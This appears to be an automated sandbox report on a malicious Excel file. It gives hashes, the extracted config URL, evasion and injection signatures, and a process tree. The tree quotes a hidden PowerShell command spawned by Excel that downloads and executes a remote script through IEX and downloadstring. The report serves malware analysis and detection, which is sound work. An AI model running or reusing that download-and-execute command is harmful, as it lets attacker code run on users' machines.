Analysis
-
max time kernel
42s -
max time network
43s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/11/2024, 21:03
Behavioral task
behavioral1
Sample
ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
Resource
win10v2004-20241007-en
General
-
Target
ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls
-
Size
30KB
-
MD5
347bea8e71a1fb34fe6c1f48cb77cef9
-
SHA1
8c24139f35afccaa2260d05e98a5547fed710527
-
SHA256
ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09
-
SHA512
a62f5088f7f2fcb8006902f32e8086bde72c199ee905ffd884f88fc60f3815e1c05a33aeff748a6533404fe8536c1371255c65e61719fd1120365d4d7d1f804f
-
SSDEEP
768:kK1Tgbyw3sz2jyngov9rjXjBCKTUAuulFFzqFVOp46msi:kK1Tgbyw3sz2jyngov9rjXjBCKoAuulQ
Malware Config
Extracted
http://127.0.0.1:8000/arquivos/windows.txt
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3952 2996 powershell.exe 83 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3952 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2996 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3952 powershell.exe 3952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3952 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE 2996 EXCEL.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 2996 wrote to memory of 3952 2996 EXCEL.EXE 87 PID 2996 wrote to memory of 3952 2996 EXCEL.EXE 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ea2ca4b289651f3b3414469ad106954407822ae10ae2a4ff08d35dadbf1f5f09.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden -noninteractive "IEX((new-object net.webclient).downloadstring('http://127.0.0.1:8000/arquivos/windows.txt'))"2⤵
- Process spawned unexpected child process
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize686B
MD507c7556a311061110771778bc27d790a
SHA11626761f67f5796823d394fcfd3117a40f8053a6
SHA25698e3115dfe329d57803a967a7dccf4df08dbc343e560bcbe0bbdcfe2395b4966
SHA512b667395a9b82f8a01ac09f85ca23ebc9f4a34b123145e1c18df202a760e5cc6613ee6566fd199a953604bdd91834cccc13ee985bd2d076136fb55511f90178ac